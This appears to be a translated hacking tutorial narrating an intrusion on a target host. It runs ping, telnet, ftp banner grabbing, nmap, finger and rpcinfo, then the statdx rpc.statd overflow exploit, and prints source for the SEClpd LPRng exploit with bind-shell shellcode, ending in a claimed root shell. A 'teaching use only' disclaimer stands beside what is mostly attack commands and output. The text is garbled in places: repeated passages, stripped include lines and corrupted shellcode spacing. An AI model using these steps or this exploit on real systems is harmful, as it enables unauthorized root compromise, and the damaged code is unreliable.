Today is Valentine’s Day, and I wish all lovers to be married, and I wish everyone a happy Valentine’s Day! But pay attention to safety at all times. Now let me talk about how to see how hackers have invaded Linux:
The purpose of this article is not to teach people to invade, but to improve their own technology and strengthen the security awareness of network administrators. That’s it! Careless network administrators should understand: A small operating error of yours may lead to the complete fall of the entire network! This article is mainly centered on the LPD: attack on the network printing service.
First determine the target, assuming it is: www.XXX.com
Let me see if I can connect:
C:\ping www.XXX.com
Pinging www.XXX.com[202.106.184.200] with 32 bytes of data:
Reply from 202.106.184.200: bytes=32 time=541ms TTL=244
Reply from 202.106.184.200: bytes=32 time=620ms TTL=244
Reply from 202.106.184.200: bytes=32 time=651ms TTL=244
Reply from 202.106.184.200: bytes=32 time=511ms TTL=244
Ping statistics for 202.106.184.200:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 511ms, Maximum = 651ms, Average = 580ms
Hee hee—not only can it be connected, but the speed is good...
First telnet to see the banner:
C:\>telnet www.XXX.comHee hee – not only can it be connected, but the speed is good…
First telnet to see the banner: C:>telnet www.XXX.com
The connection to the host is lost.
Try ftp again
C:\>ftp www.XXX.com
Connected to www.fbi.gov.tw.
220 XXX-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.
User (www.XXX.com:(none)):wu-2.6.1 seems a little bit eye-catching. This machine looks like RedHat7.0! First of all, you must confirm it, and connect to my springboard:
C:\>telnet xxx.xxx.xxx.xxx
Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22smp on an i686
login: fetdog
Password:
bash-2.04$Take the nmap scanner to see the mystery~~~
The following is a quoted snippet:
bash-2.04 $ nmap -sT -O www.XXX.com
Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
WARNING! The following files exist and are readable: /usr/local/sha
-services and ./nmap-services. I am choosing /usr/local/share/nmap/
s for security reasons. set NMAPDIR=. to give priority to files in
irectory
Interesting ports on (www.XXX.com):
(The 1520 ports scanned but not shown below are in state: closed)
Port State Service
25/tcp open smtp
79/tcp open finger
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
443/tcp open https
513/tcp open login
514/tcp open shell
515/tcp open printer
587/tcp open submission
1024/tcp open kdm
TCP Sequence Prediction: positive increments
Difficulty=3247917 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.16
Nmap run completed -- 1 IP address (1 host up) scanned in 9 secondsThere are quite a lot of open ports, which means that the possibility of intrusion increases. 79/tcp open finger, take a look at this first, but Linux does not have a loophole in the finger user list.
bash-2.04$finger @www.XXX.com
[www.XXX.com]
No one logged on.Look at 111/tcp open sunrpc again. Recently, rpc vulnerabilities have become popular. I don’t know if RH7 will have this stuff? Let’s take a look first!
The following is a quoted snippet:
bash-2.04$rpcinfo -p www.XXX.com
program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100024 1 udp 1025 status
100024 1 tcp 1024 statusIt seems that there is rpc.statd service. Let’s see if we can remotely overflow and get a rootshell.
bash-2.04$./statdx -h
statdx by ron1n
Usage: stat [-t] [-p port] [-a addr] [-l len]
[-o offset] [-w num] [-s secs] [-d type]
-t attack a tcp dispatcher [udp]
-p rpc.statd serves requests on [query]
-a the stack address of the buffer is
-l the length of the buffer is [1024]
-o the offset to return to is [600]
-w the number of dwords to wipe is [9]
-s set timeout in seconds to [5]
-d use a hardcoded
Available types:
0 Redhat 6.2 (nfs-utils-0.1.6-2)
1 Redhat 6.1 (knfsd-1.4.7-7)
2 Redhat 6.0 (knfsd-1.2.2-4)
It does not seem to support RH7. Still continue to try, try all 0-2! start……
bash-2.04$stat -d 0 www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21
Frustrated, try again...
bash-2.04$stat -d 1 www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21The same continue
The following is a quoted snippet:
bash-2.04$stat -d 1 www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21rpc.statd does not work, think about RH7 there should be a remote overflow, it seems to be caused by the lp service. “Seclpd.c” should be this stuff.
The following code is for teaching use only and should not be used for malicious attacks.
/*
* Welcome to http://hlc.cnroot.com/
* Run: ./SEClpd victim brute -t type
* Try first ./SEClpd victim -t 0 then try the brute.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define ADDRESS_BUFFER_SIZE 32+4
#define APPEND_BUFFER_SIZE 52
#define FORMAT_LENGTH 512-8
#define NOPCOUNT 200
#define SHELLCODE_COUNT 1030
#define DELAY 50000 /* usecs */
#define OFFSET_LIMIT 5000
char shellcode[] =
"\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\ xb2 \ x3f \ x89 \ xd0 \ xcd \ x80 \ x89 \ xd0 \ x41 \ xcd \ x80 \ xeb \ x18 \ x5e \ x89 \ x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";brute brute force. After waiting for 5-8 minutes, the result came out.
- [+] shell located on www.XXX.com
- [+] Enter Commands at will
Linux XXX.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown uid=0(root) gid=7(lp)uid=0 (root privileges), now you can invade further! But don’t do bad things!
bash-2.04$stat -d 1 www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21rpc.statd does not work, think about RH7 there should be a remote overflow, it seems to be caused by the lp service. “Seclpd.c” should be this stuff.
